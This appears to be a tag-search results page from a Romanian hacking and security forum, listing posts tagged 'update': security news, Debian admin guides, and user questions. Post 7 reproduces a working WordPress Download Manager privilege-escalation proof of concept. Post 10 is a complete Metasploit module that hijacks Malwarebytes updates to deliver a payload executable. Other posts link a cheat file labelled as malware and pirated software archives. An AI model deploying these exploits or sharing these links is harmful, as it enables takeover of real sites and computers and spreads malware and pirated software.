Jump to content

Search the Community

Showing results for tags 'update'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 15 results

  1. Primesc PM de la un gagiu florinandrei2000, si citez: "Salut. Vrei sa castigi 16$ in bitcoin? Daca da fa un cont pe Plat? online cu o solu?ie prepl?tit? sigur? - paysafecard.com si fa update la statutul unlimited. Dupa ce ai statutul unlimited lasa-mi user parola si raspuns la intrebarea secreta si in maxim 3 ore iti trimit banii in bitcoin." A ce va miroase?
  2. Salutare, am revenit cu o stire interesanta si anume securitatea celor de la Lenovo scartaie. O noua problema de securitate a fost descoperita zilele trecute, mai bine acuma decat niciodata. Compania Lenovo a fost acuzat? c? ar avea probleme mari în ceea ce prive?te securitatea, din cauza vulnerabilit??ilor din serviciul de actualizare online. Asta dup? scandalul Superfish de la începutul anului. Se pare c? din cauza actualelor vulnerabilit??i, hackerii pot desc?rca programe periculoase în sistemele utilizatorilor printr-un atac de tip MITM (man-in-the-middle). Lenovo a preinstalat pe mai mult computere., între septembrie 2014 ?i ianuarie 2015, o aplica?ie de tip adware care a expus utilizatorii la riscuri majore de securitate. Superfish era capabil ?i s? înlocuiasc? certificatele SSL ale sistemului, reducând la zero securitate oferit? de conexiunile HTTPS. Problemele au fost ar?tate de firma de securitate IOActive, la câteva s?pt?mâni dup? ce s-a aflat c? Lenovo distribuia computere cu Superfish preinstalat. Cercet?torii au descoperit vulnerabilit??ile în februarie, dar le-au oferit celor de la Lenovo ocazia de a le repara, înainte de a le face publice, noteaz? SC Magazine. Una dintre vulnerabilit??i, CVE-2015-2233, permite hackerilor s? treac? de verific?rile validit??ii semn?turii ?i s? înlocuiasc? aplica?ii Lenovo cu software-uri r?u inten?ionate. CVE-2015-2219, alt bug, permite accesul ?i rularea programelor ?i comenzilor mali?ioase. O alt? sl?biciune, CVE-2015-2234, permite efectuarea comenzilor pe care, în mod normal, doar administratorul de sistem le poate da. Sofiane Talmat, consultant în securitate pentru IOActive, a confirmat pentru SCMagazine c? Lenovo a rezolvat problemele, dar c? utilizatorii trebuie s? descarce ultima versiune a Lenovo System Update pentru a fi siguri. Actualizare Acest articol a fost completat cu declara?ia oficial? a celor de la Lenovo: “Echipele Lenovo de dezvoltare ?i securitate au colaborat în mod direct cu IOActive referitor la vulnerabilit??ile aplica?iei System Update depistate de ace?tia din urm? ?i apreciem expertiza acestora pentru identificarea ?i raportarea lor cu responsabilitate. Lenovo a lansat pe 1 aprilie o versiune actualizat? a aplica?iei System Update care solu?ioneaz? aceste vulnerabilit??i. Am publicat ulterior, in colaborare cu IOActive, o not? de securitate, disponibil? aici. În situa?ia în care aplica?ia System Update a fost deja instalat?, utilizatorului i se cere s? instaleze versiunea actualizat? de îndat? ce aplica?ia ruleaz?. Ca solu?ie alternativ?, utilizatorii pot actualiza manual System Update, urmând pa?ii descri?i în nota de securitate. Lenovo recomand? tuturor utilizatorilor s? actualizeze aplica?ia System Update pentru a elimina vulnerabilit??ile raportate de IOActive. În general, Lenovo recomand? utilizatorilor s?i s? permit? actualizarea automat? a sistemelor, pentru a avea în permanen?? acces la cele mai nou software disponibil.” Multumesc pentru timpul acordat!
  3. HARDWARE FIRM Lenovo has been accused of offering its customers another free bonus security threat just weeks after the Superfish scandal. The firm has already fixed the problem, but the news, and its description as another "massive security risk", isn't good. Superfish was a scandal for the firm and affected a lot of its hardware. Lenovo disabled the software and took any associated financial losses on the chin. Ultimately, the firm said that it had failed its customers. "We recognise that the software did not meet that goal and have acted quickly and decisively. We are providing support on our forums for any user with concerns," Lenovo said at the time. "Our goal is to find technologies that best serve users. In this case, we have responded quickly to negative feedback and taken decisive actions to ensure that we address these concerns." Today we asked the firm to comment on the findings of IOActive Lab researchers who accused it of major vulnerabilities and a system that enables the creation and exploitation of fake credentials and the handing over of system control. IOActive Lab said in a security report (PDF) that the problem has been fixed, but that it had granted attackers the same kind of access as a system update, and allowed for the execution of code. Attackers could exploit an flaw in Lenovo's certificate authority methods, and use it to sign off their own executables which could have a range of capabilities. "Local and potentially remote attackers can bypass signature validation checks and replace trusted Lenovo applications with malicious applications," said the advisory. "These applications will then be run as a privileged user. The System Update downloads executables from the internet and runs them. "Remote attackers who can perform a man-in-the-middle attack can exploit this to swap Lenovo's executables with a malicious executable. "The System Update uses TLS/SSL to secure its communications with the update server, which should protect against [such] attacks. "In a statement Lenovo told the INQUIRER that it worked with the security firm after it was notified and patched the problem in April. It added that it appreciates the assistance, explaining that its update fixed all issues. "Lenovo's development and security teams worked directly with IOActive regarding their System Update vulnerability findings, and we value their expertise in identifying and responsibly reporting them," it said. "Lenovo released an updated version of System Update which resolves these vulnerabilities and subsequently published a security advisory in coordination with IOActive. Lenovo recommends that all users update System Update to eliminate the vulnerabilities reported by IOActive." Source
  4. #Cheat's for cs 1.6 / cs g.o #Work eac #work steam #Vac all update #Work anti cheats all version #Anti screen #Esp box Descarcati doar pentru analiza, este mallware https://www.sendspace.com/file/vhlt2v Download Cubex software [HL1] elementary aimbot version 5.2.rar
  5. Google's Chrome browser will stop trusting all digital certificates issued by the China Internet Network Information Center following a major trust breach last week that led to the issuance of unauthorized credentials for Gmail and several other Google domains. The move could have major consequences for huge numbers of Internet users as Chrome, the world's second most widely used browser, stops recognizing all website certificates issued by CNNIC. That could leave huge numbers of users suddenly unable to connect to banks and e-commerce sites. To give affected website operators time to obtain new credentials from a different certificate authority, Google will wait an unspecified period of time before implementing the change. Once that grace period ends, Google engineers will blacklist both CNNIC's root and extended-validation certificates in Chrome and all other Google software. The unauthorized certificates were issued by Egypt-based MCS Holdings, an intermediate certificate authority that operated under the authority of CNNIC. MCS used the certificates in a man-in-the-middle proxy, a device that intercepts secure connections by masquerading as the intended destination. Such devices are sometimes used by companies to monitor employees' encrypted traffic for legal or human resources reasons. It's one of the first times a certificate authority has faced such a banishment since the downfall of Netherlands-based DigiNotar in 2011. Other CAs, including US-based Trustwave, have also done what CNNIC did without getting the boot. While worldwide Chrome is the No. 2 most used browser, it had a commanding, 52-percent share in China last year, compared to 23 percent for IE. The move was announced on Wednesday evening in an update to last week's blog post disclosing the misissued certificates. The update left open the possibility that CNNIC may be reinstated at an undetermined future date if the group gives a detailed accounting of all currently valid certificates. The update read: As this post was being prepared, it wasn't clear if Mozilla or Microsoft planned to update Firefox and Internet explorer to also stop trusting CNNIC. Firefox 37, released this week, stopped trusting all certificates issued by MCS Holdings, and Microsoft has announced similar plans for Windows. Revoking trust in the root CNNIC certificate would be a much more disruptive course of action, since many more website certificates would be affected. Update 1: In an e-mailed statement, Mozilla Cryptographic Engineering Manager Richard Barnes said: "We believe it is very important to include the Mozilla community in these discussions, so we are taking a bit longer to announce our official plan. We expect to wrap up our discussion in mozilla.dev.security.policy soon, and in the meantime you can see the plan we are currently discussing here." The plan under consideration would: Reject certificates chaining to CNNIC with a notBefore date after a threshold date Request that CNNIC provide a list of currently valid certificates and publish that list so that the community can recognize any back-dated certs Allow CNNIC to re-apply for full inclusion, with some additional requirements (to be discussed on this list) If CNNIC's re-application is unsuccessful, then their root certificates will be removed Update2: Officials with CNNIC have issued a statement that's sharply critical of Google's move. It reads: Source
  6. To install Dell OpenManage on Debian 7 we should proceed some steps. Let's think that we use a clean Debian 7 install. The first step in to run the next command to update the server: apt-get update && apt-get install sudo -y && apt-get upgrade -y After updating the system we should add some pre-requirements like libssl0.9.8 using commands: cd /tmp && wget http://ftp.us.debian.org/debian/pool/main/o/openssl/libssl0.9.8_0.9.8o-4squeeze14_amd64.deb dpkg -i libssl0.9.8_0.9.8o-4squeeze14_amd64.deb Now we will create a new file in sources.list: echo “deb http://linux.dell.com/repo/community/ubuntu wheezy openmanage” > /etc/apt/sources.list.d/linux.dell.com.sources.list Adding the keys: gpg --keyserver pool.sks-keyservers.net --recv-key 1285491434D8786F gpg -a --export 1285491434D8786F | sudo apt-key add - sudo apt-get update Install libcurl3 and OpenManage: apt-get install libcurl3 srvadmin-all -y Now we should change the run level because the default settings have a bug. Open file nano /etc/init.d/dsm_om_connsvc and change Default-Start and Default-Stop like in the next: # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 Now we will remove and add again dsm_om_connsvc with the new params: update-rc.d -f dsm_om_connsvc remove update-rc.d dsm_om_connsvc defaults update-rc.d dataeng defaults Restart the server and navigate to https://server_ip:1311 and login with your root user and password. Author: razvan1@hy
  7. # Exploit Title: WordPress Download Manager 2.7.2 Privilege Escalation # Date: 24-11-2014 # Software Link: https://wordpress.org/plugins/download-manager/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps # CVE: CVE-2014-9260 1. Description Every registered user can update every WordPress options using basic_settings() function. function basic_settings() { if (isset($_POST['task']) && $_POST['task'] == 'wdm_save_settings') { foreach ($_POST as $optn => $optv) { update_option($optn, $optv); } if (!isset($_POST['__wpdm_login_form'])) delete_option('__wpdm_login_form'); die('Settings Saved Successfully'); } include('settings/basic.php'); } http://security.szurek.pl/wordpress-download-manager-272-privilege-escalation.html 2. Proof of Concept Login as standard user (created using wp-login.php?action=register) then: <form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wdm_settings"> <input type="hidden" name="task" value="wdm_save_settings"> <input type="hidden" name="section" value="basic"> <input type="hidden" name="default_role" value="administrator"> <input type="submit" value="Hack!"> </form> After that create new user using wp-login.php?action=register. Newly created user will have admin privileges. 3. Solution: Update to version 2.7.3 Source
  8. Nu as fi postat daca nu as fi cautat prima data pe google dar nu am gasit nimic util. Telefonul a mers bine pana sa ii fac update oficial la 4.3. Imediat dupa update am probleme cu Wifi si Bluetooth-ul care nu se activeazau, se blocheaza cu ecraul stins si diferite erori in aplicatii. Am schimbat romul cu unul tot oficial 4.1.2 dar problema persista. Ideea ca e nu face mereu asa, uneori merge alterori nu. Credeti ca i-as mai putea face eu ceva sau direct service?
  9. Product Description Updating drivers is usually an initial step to avoid hardware failure, system instability and hidden security vulnerabilities. To update drivers regularly is also an effective way to enhance your overall PC performance, and maximize your gaming experience. While this process could be risky and frustrating if done manually, Driver Booster PRO is introduced to download and update drivers for you automatically with just one click. Based on cloud library, Driver Booster PRO can always be the first to identify outdated drivers, and download and update driver at an unrivaled speed. With the backup feature, it is an easy, effective and risk free solution to keep your drivers up-to-date Automatically Identify Outdated Drivers Download and Update Outdated Drivers with One Click Fast Driver Download and Update Speed Specialized Driver Tweaking for Top Gaming Experience Support More Comprehensive Hardware Devices Enjoy Priority to Update Outdated Drivers Promptly Backup Drivers for Safe Restore Enhance Hardware Functionality for Top Performance Automatically Update to the Latest Version. -> Download <- Deal Expires in: EXPIRED!
  10. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpServer VERSION_REGEX = /\/v2\/(mbam|mbae)\/consumer\/version.chk/ EXE_REGEX = /\/v2\/(mbam|mbae)\/consumer\/data\/(mbam|mbae)-setup-(.*)\.exe/ NEXT_VERSION = { mbam: '2.0.3.1025', mbae: '1.04.1.1012' } def initialize(info = {}) super(update_info(info, 'Name' => 'Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability in the update functionality of Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes Anti-Exploit consumer 1.03.1.1220. Due to the lack of proper update package validation a man-in-the-middle attacker could execute arbitrary code by spoofing the update server data-cdn.mbamupdates.com and uploading an executable. This module has been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220. }, 'License' => MSF_LICENSE, 'Author' => [ 'Yonathan Klijnsma', # Vulnerability discovery and PoC 'Gabor Seljan', # Metasploit module 'todb' # Module refactoring ], 'References' => [ [ 'CVE', '2014-4936' ], [' OSVDB', '116050'], [ 'URL', 'http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and'] # Discoverer's blog ], 'DefaultOptions' => { 'EXITFUNC' => 'process' }, 'Platform' => 'win', 'Targets' => [ [ 'Windows Universal', {} ] ], 'Privileged' => false, 'DisclosureDate' => 'Dec 16 2014', 'DefaultTarget' => 0 )) register_options( [ OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]), OptString.new('URIPATH', [ true, "The URI to use (do not change)", "/" ]) ], self.class) # Vulnerable Malwarebytes clients do not allow altering these. deregister_options('SSL', 'SSLVersion', 'SSLCert') end def on_request_uri(cli, request) case request.uri when VERSION_REGEX serve_update_notice(cli) if set_exploit_target($1, request) when EXE_REGEX serve_exploit(cli) else vprint_status "Sending empty page for #{request.uri}" serve_default_response(cli) end end def serve_default_response(cli) send_response(cli, '') end def check_client_version(request) return false unless request['User-Agent'] =~ /base:(\d+\.\d+\.\d+\.\d+)/ this_version = $1 next_version = NEXT_VERSION[:mbam] if Gem::Version.new(next_version) >= Gem::Version.new(this_version) return true else print_error "Version #{this_version} of Anti-Malware isn't vulnerable, not attempting update." return false end end def set_exploit_target(package, request) case package when /mbam/i if check_client_version(request) @client_software = ['Anti-Malware', NEXT_VERSION[:mbam]] else serve_default_response(cli) return false end when /mbae/i # We don't get identifying info from MBAE @client_software = ['Anti-Exploit', NEXT_VERSION[:mbae]] end end def serve_update_notice(cli) software,next_version = @client_software print_status "Updating #{software} to (fake) #{next_version}. The user may need to click 'OK'." send_response(cli, next_version, 'Content-Type' => 'application/octet-stream' ) end def serve_exploit(cli) print_status "Sending payload EXE..." send_response(cli, generate_payload_exe, 'Content-Type' => 'application/x-msdos-program' ) end end Source
  11. Oracle has released a critical patch update fixing 167 vulnerabilities across hundreds of its products, warning that the worst of them could be remotely exploited by hackers. The pressing fixes involve several of Oracle's most widely used products and scored a full 10.0 rating on the CVSS 2.0 Base Score for vulnerabilities, the highest score available. "The highest CVSS 2.0 Base Score for vulnerabilities in this critical patch update is 10.0 for Fujitsu M10-1 of Oracle Sun Systems Products Suite, Java SE of Oracle Java SE, M10-4 of Oracle Sun Systems Products Suite and M10-4S Servers of Oracle Sun Systems Products Suite," read the advisory. "Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply critical patch update fixes as soon as possible." Oracle warned that the updates for Fujitsu M10-1 of Oracle Sun Systems Products Suite are particularly important. "This critical patch update contains 29 new security fixes for the Oracle Sun Systems Products Suite," the advisory said. "Ten of these vulnerabilities may be remotely exploitable without authentication [and] may be exploited over a network without the need for a username and password." The Oracle Java SE update fixes 19 flaws, 14 of which were also remotely exploitable. The next most serious flaws relate to Oracle's Fusion Middleware, which received 35 security fixes. The worst carries a 9.3 rating and could also be remotely exploited. The update follows reports that hackers are targeting enterprise companies with malware-laden patches purporting to come from Oracle. The news comes during a period of heated debate about patching best practice. Microsoft announced plans on 9 January to stop offering non-paying customers advanced patch notifications. The announcement led to a backlash in the security community, many feeling that the move is a money-grabbing tactic by Microsoft. Prior to the move, Microsoft came to blows with Google over the search firm's public disclosure of a Windows bug. Google Project Zero researchers publicly disclosed the bug in December 2014 having privately reported it to Microsoft in September. The move led to a debate about what constitutes responsible threat disclosure. Source
  12. Autodesk Revit Structure 2014 Update 2 ISO Autodesk Revit Structure 2014 Update 2 ISO | 3.01 GB Autodesk Revit software delivers tools that support architectural design, MEP engineering, structural engineering and construction. Revit is specifically built for Building Information Modeling (BIM) to help you design, build, and maintain higher-quality more energy-efficient buildings. Comprehensive features make it an ideal solution for the entire building project team. DOWNLOAD LINKS: http://u19822771.letitbit.net/download/19487.1aa67e48e866ab4f34ecbffb48f9/29.rst2014u2.part1.rar.html http://u19822771.letitbit.net/download/20510.2ef87fe18bc5eec2aab85c43b21a/29.rst2014u2.part2.rar.html http://u19822771.letitbit.net/download/17106.102841fac69639ed94867197008a/29.rst2014u2.part3.rar.html http://u19822771.letitbit.net/download/02636.03eeb255b8572926105cb15b3784/29.rst2014u2.part4.rar.html http://u19822771.letitbit.net/download/61943.604f953758249e957f89ca74c3a8/29.rst2014u2.part5.rar.html http://uploaded.net/file/757cevjc/29.rst2014u2.part1.rar http://uploaded.net/file/k8tkrh8l/29.rst2014u2.part2.rar http://uploaded.net/file/c1696686/29.rst2014u2.part3.rar http://uploaded.net/file/62jg8h78/29.rst2014u2.part4.rar http://uploaded.net/file/wd0d81k7/29.rst2014u2.part5.rar http://rapidgator.net/file/e4ecda27eeecb3fcb7724bbe8d29ea54/29.rst2014u2.part1.rar.html http://rapidgator.net/file/809f31171082f45db3c3392dc8ed5542/29.rst2014u2.part2.rar.html http://rapidgator.net/file/b7a9eb9e59c9423a9433518ed9ff8c75/29.rst2014u2.part3.rar.html http://rapidgator.net/file/f0e4f2cd34e25c8daa4e4901c4993d2b/29.rst2014u2.part4.rar.html http://rapidgator.net/file/7bf774997312c66cb202acc80338cf50/29.rst2014u2.part5.rar.html http://www.uploadable.ch/file/mJkZhFmbXDxY/29.rst2014u2.part1.rar http://www.uploadable.ch/file/V6Su2srC5UC6/29.rst2014u2.part2.rar http://www.uploadable.ch/file/s3kp2EfBsN2m/29.rst2014u2.part3.rar http://www.uploadable.ch/file/MggY9zJ8rYtG/29.rst2014u2.part4.rar http://www.uploadable.ch/file/WaQwBGwTHBtz/29.rst2014u2.part5.rar
  13. Best Mac Apps Collection (Update 3) August.2014 Best Mac Apps Collection (Update 3) August.2014 | 23.6 GB Finding the perfect application could be really difficult sometimes. In this article I've collected the best 36 Mac Applications found on the web, all app full active. I hope you'll find them useful.List Apps:- Adobe Acrobat XI Pro 11.0.7 (Mac OS X)- Adobe Photoshop.Lightroom.5.6.Final (Mac OS X)- Adobe Premiere Elements 12 Multi (Mac OS X)- Adobe Photoshop CC 2014.15.1 Multilingual (Mac OS X)- ArchiCAD 18 (3006) (Mac OS X)- Autodesk Maya 2014 SP4 (Mac OS X)- Kolor Autopano Giga 3.6.3 (Mac OS X)- Kolor Autopano Video Pro 1.6.3 (Mac OS X)- Kolor Panotour Pro v2.1.3 (Mac OS X)- DxO Optics Pro 9.1.5 Build 106 (Elite) (Mac OS X)- FXFactory Pro 4.1.7 (Mac OS X)- Final Cut Pro X 10.1.2 + Motion 5.1.1 + Compressor 4.1.2 + mLooks 1.2- Maxon CINEMA 4D Studio R15 RETAIL (Mac OS X)- Camtasia 2.8.2 (Mac OS X)- Capture One Pro 7.2.2.2 (Mac OS X)- CleanMyMac 2.2.5 (Mac OS X)- Data Rescue 3.2.4 (Mac OS X)- Dragonframe 3.5.7 (Mac OS X)- Drive Genius 3.2.4 (Mac OS X)- GraphicConverter 9.3 (Mac OS X)- HDR Light Studio 4.2 (Mac OS X)- HyperDock 1.3.3 (Mac OS X)- Imagenomic Portraiture 2.3.3 for Adobe PS (Mac OS X)- Rosetta Stone TOTALe v4.1.15 Mac OS X- Microsoft Office 2011 14.4.1 Volume.Licensed (Mac OS X)- Native Instruments Kontakt 5.3.1 Standalone AU 64bit MacOSX- onOne Perfect Photo Suite Premium Edition 8.5.1 MacOSX- Parallels Desktop 9.0.24237 (Mac OS X)- PhoneView 2.8.6 (Mac Os X)- PopClip 1.4.6 (Mac OS X)- ProVideo2.0.5.Mac.OSX- QuickBooks Pro 2014 15.0.5 R6 Mac OS X- Radium 3.0.3 (Mac OS X)- ScreenFlow 4.5.2 (Mac OS X)- Suitcase Fusion 5 v16.2.3 (Mac OS X)- UnRar X Mac OS X- VMware Fusion 6.0.4 Professional (Mac OS X)- Wondershare PDF Editor Pro 3.1.0 (Mac OS X)- XScope 3.6 (Mac OS X)- Serial Box 08.2014 + SerialSeeker 1.3.7 (B11) + iSerial Reader 2.0.16- KCNcrew Pack 07-15-14 (Mac OS X) DOWNLOAD LINKS: http://u19822771.letitbit.net/download/28392.2531f8bf4f0ff07ac168b7d54d00/MacCollection.August.2014.part01.rar.html http://u19822771.letitbit.net/download/34499.31ad71c605d2a79a74f1f2ed9437/MacCollection.August.2014.part02.rar.html http://u19822771.letitbit.net/download/44646.40eb1245eeb06cf8b19718bcb12a/MacCollection.August.2014.part03.rar.html http://u19822771.letitbit.net/download/22102.25644a3683651db1d4a392e1e3e6/MacCollection.August.2014.part04.rar.html http://u19822771.letitbit.net/download/74482.7652679044b0b8f0864a9d86d050/MacCollection.August.2014.part05.rar.html http://u19822771.letitbit.net/download/90476.99941f7c248819aff3a5556a0870/MacCollection.August.2014.part06.rar.html http://u19822771.letitbit.net/download/93782.952bdbed4e9f7bb1c4e1c45d52a9/MacCollection.August.2014.part07.rar.html http://u19822771.letitbit.net/download/60116.6c2a72cb5fce95c88c6c3c12f844/MacCollection.August.2014.part08.rar.html http://u19822771.letitbit.net/download/69016.63adf252ad0a8b983fbf471fa2b2/MacCollection.August.2014.part09.rar.html http://u19822771.letitbit.net/download/59423.50258ff8e0d24442b2fca4c4d637/MacCollection.August.2014.part10.rar.html http://u19822771.letitbit.net/download/37033.37f0cd2bec52cdc485e27aa3d680/MacCollection.August.2014.part11.rar.html http://u19822771.letitbit.net/download/38065.3da1915146a65fd9aa1010e32144/MacCollection.August.2014.part12.rar.html http://u19822771.letitbit.net/download/43358.4722d0332f758f551ab5c62eb512/MacCollection.August.2014.part13.rar.html http://u19822771.letitbit.net/download/15723.1d75abbbfa7d749300e1462afe37/MacCollection.August.2014.part14.rar.html http://u19822771.letitbit.net/download/95594.99fd502f6355d49e3d7f81dd0648/MacCollection.August.2014.part15.rar.html http://rapidgator.net/file/5ae68b828b8f09416a71c27d3fb49392/MacCollection.August.2014.part01.rar.html http://rapidgator.net/file/76c8d41ab1c9a8245369802ad048c332/MacCollection.August.2014.part02.rar.html http://rapidgator.net/file/ec55f783157b73244e1ba25f4d450ebf/MacCollection.August.2014.part03.rar.html http://rapidgator.net/file/89c835c5eff7c030a1b3dbc4c4562767/MacCollection.August.2014.part04.rar.html http://rapidgator.net/file/76792a0994c540319eb1a407ab78e7bd/MacCollection.August.2014.part05.rar.html http://rapidgator.net/file/33b7f62cce6b693d81b90ba168eddd27/MacCollection.August.2014.part06.rar.html http://rapidgator.net/file/6e5dddaf2492b04a1d4ee794e95a23cc/MacCollection.August.2014.part07.rar.html http://rapidgator.net/file/248887f56f80a1178c77c9666f85ab3f/MacCollection.August.2014.part08.rar.html http://rapidgator.net/file/f8a55a8958036fb17d320f28eee5d5e1/MacCollection.August.2014.part09.rar.html http://rapidgator.net/file/c17b062972e7595f269c43fdc1ce398f/MacCollection.August.2014.part10.rar.html http://rapidgator.net/file/a6887fdaff8e08a8006a53d9bb2c4f9e/MacCollection.August.2014.part11.rar.html http://rapidgator.net/file/cb2f179ebab0081afc102f1ecf217ad1/MacCollection.August.2014.part12.rar.html http://rapidgator.net/file/28c50f27d136a271a6cba9c9d35fe5da/MacCollection.August.2014.part13.rar.html http://rapidgator.net/file/55a894f178dc611cbe88729e31924277/MacCollection.August.2014.part14.rar.html http://rapidgator.net/file/559539019457e4910e7a81aa795c94a5/MacCollection.August.2014.part15.rar.html http://www.uploadable.ch/file/eKbzez6dxvTN/MacCollection.August.2014.part01.rar http://www.uploadable.ch/file/qA5W77Ybrmtq/MacCollection.August.2014.part02.rar http://www.uploadable.ch/file/tg6TxPbPZ7mm/MacCollection.August.2014.part03.rar http://www.uploadable.ch/file/sygErYkrAPMY/MacCollection.August.2014.part04.rar http://www.uploadable.ch/file/2qrAqHbJ9yxF/MacCollection.August.2014.part05.rar http://www.uploadable.ch/file/QJMHzA7mXMyy/MacCollection.August.2014.part06.rar http://www.uploadable.ch/file/tavBApTNEcZD/MacCollection.August.2014.part07.rar http://www.uploadable.ch/file/kzgAuDzH9Y9B/MacCollection.August.2014.part08.rar http://www.uploadable.ch/file/Dxq58jxwY9Sq/MacCollection.August.2014.part09.rar http://www.uploadable.ch/file/sdbTXvkntgCK/MacCollection.August.2014.part10.rar http://www.uploadable.ch/file/SQYK7jzmhs9Q/MacCollection.August.2014.part11.rar http://www.uploadable.ch/file/Mrc4jqzE3wu6/MacCollection.August.2014.part12.rar http://www.uploadable.ch/file/m9NBPaTxN3FY/MacCollection.August.2014.part13.rar http://www.uploadable.ch/file/7y5EstZwckDE/MacCollection.August.2014.part14.rar http://www.uploadable.ch/file/zxXMWNqJcuER/MacCollection.August.2014.part15.rar
  14. Daca doriti sa fiti notificati atunci cand sunt disponibile update-uri la pachetele de pe Debian, puteti utiliza apticron. Apticron este un script bash ce este rulat din crontab si verifica daca exista upgrade-uri la pachetele instalate. In cazul in care exista, va trimite o notificare detaliata prin email. Este foarte customizabil si util. Instalarea acestuia se face foarte simplu: root@pluto:~# apt-get install apticron Reading package lists... Done Building dependency tree Reading state information... Done The following NEW packages will be installed: apticron 0 upgraded, 1 newly installed, 0 to remove and 70 not upgraded. Need to get 20.1 kB of archives. After this operation, 88.1 kB of additional disk space will be used. Get:1 http://ftp.de.debian.org/debian/ wheezy/main apticron all 1.1.55 [20.1 kB] Fetched 20.1 kB in 0s (120 kB/s) Preconfiguring packages ... Selecting previously unselected package apticron. (Reading database ... 53927 files and directories currently installed.) Unpacking apticron (from .../apticron_1.1.55_all.deb) ... Processing triggers for man-db ... Setting up apticron (1.1.55) ... Creating config file /etc/apticron/apticron.conf with new version Creating config file /etc/cron.d/apticron with new version root@pluto:~# Am editat fisierul '/etc/apticron/apticron.conf' si l-am configurat dupa cum urmeaza: EMAIL="tex@myfuckingdomain.org" SYSTEM="pluto.myfuckingdomain.org" IPADDRESSNUM="1" CUSTOM_SUBJECT="Pluto Server - available update packages" CUSTOM_FROM="system@myfuckingdomain.org" Am sters fisierul '/etc/cron.d/apticron' si am adaugat in loc de el un crontab in '/etc/crontab' care sa ruleze la ora 10.30: root@pluto:~# rm -f /etc/cron.d/apticron root@pluto:~# echo "30 10 * * * root if test -x /usr/sbin/apticron; then /usr/sbin/apticron --cron; else true; fi" >> /etc/crontab Cam asa arata reportul trimis pe email: apticron report [Thu, 03 Apr 2014 23:24:38 +0100] ======================================================================== apticron has detected that some packages need upgrading on: pluto.myfuckingdomain.org [ 188.240.xx 94.177.xx 94.177.xx 188.240.xx ] The following packages are currently pending an upgrade: apache2.2-bin 2.2.22-13+deb7u1 apache2.2-common 2.2.22-13+deb7u1 apache2-mpm-prefork 2.2.22-13+deb7u1 apache2-prefork-dev 2.2.22-13+deb7u1 apache2-utils 2.2.22-13+deb7u1 apt 0.9.7.9+deb7u1 apt-utils 0.9.7.9+deb7u1 base-files 7.1wheezy4 curl 7.26.0-1+wheezy8 dropbox 1.6.1 gnupg 1.4.12-7+deb7u3 gpgv 1.4.12-7+deb7u3 libapache2-mod-php5 5.4.4-14+deb7u8 libapache2-mod-rpaf 0.6-7+wheezy1 libapt-inst1.5 0.9.7.9+deb7u1 libapt-pkg4.12 0.9.7.9+deb7u1 libavcodec53 6:0.8.10-1 libavformat53 6:0.8.10-1 libavutil51 6:0.8.10-1 libc6 2.13-38+deb7u1 libc6-dev 2.13-38+deb7u1 libc-bin 2.13-38+deb7u1 libc-dev-bin 2.13-38+deb7u1 libcurl3 7.26.0-1+wheezy8 libcurl3-gnutls 7.26.0-1+wheezy8 libexpat1 2.1.0-1+deb7u1 libexpat1-dev 2.1.0-1+deb7u1 libgnutls26 2.12.20-8+deb7u1 libmysqlclient18 5.5.35-rel33.0-611.wheezy libmysqlclient18.1 5.6.15-25.5-759.wheezy libmysqlclient-dev 5.6.15-25.5-759.wheezy libnet-server-perl 2.006-1+deb7u1 libperconaserverclient18 5.5.36-rel34.2-648.wheezy libpq5 9.1.12-0wheezy1 libpq-dev 9.1.12-0wheezy1 libpython2.7 2.7.3-6+deb7u2 librsvg2-2 2.36.1-2 librsvg2-common 2.36.1-2 libssl-doc 1.0.1e-2+deb7u4 libswscale2 6:0.8.10-1 linux-image-3.2.0-4-amd64 3.2.54-2 linux-libc-dev 3.2.54-2 locales 2.13-38+deb7u1 memcached 1.4.13-0.2+deb7u1 multiarch-support 2.13-38+deb7u1 mutt 1.5.21-6.2+deb7u2 openssl 1.0.1e-2+deb7u4 percona-server-client-5.5 5.5.36-rel34.2-648.wheezy percona-server-common-5.5 5.5.36-rel34.2-648.wheezy percona-server-server-5.5 5.5.36-rel34.2-648.wheezy php5 5.4.4-14+deb7u8 php5-cli 5.4.4-14+deb7u8 php5-common 5.4.4-14+deb7u8 php5-curl 5.4.4-14+deb7u8 php5-dev 5.4.4-14+deb7u8 php5-fpm 5.4.4-14+deb7u8 php5-gd 5.4.4-14+deb7u8 php5-intl 5.4.4-14+deb7u8 php5-mcrypt 5.4.4-14+deb7u8 php5-mysql 5.4.4-14+deb7u8 php5-sqlite 5.4.4-14+deb7u8 php5-sybase 5.4.4-14+deb7u8 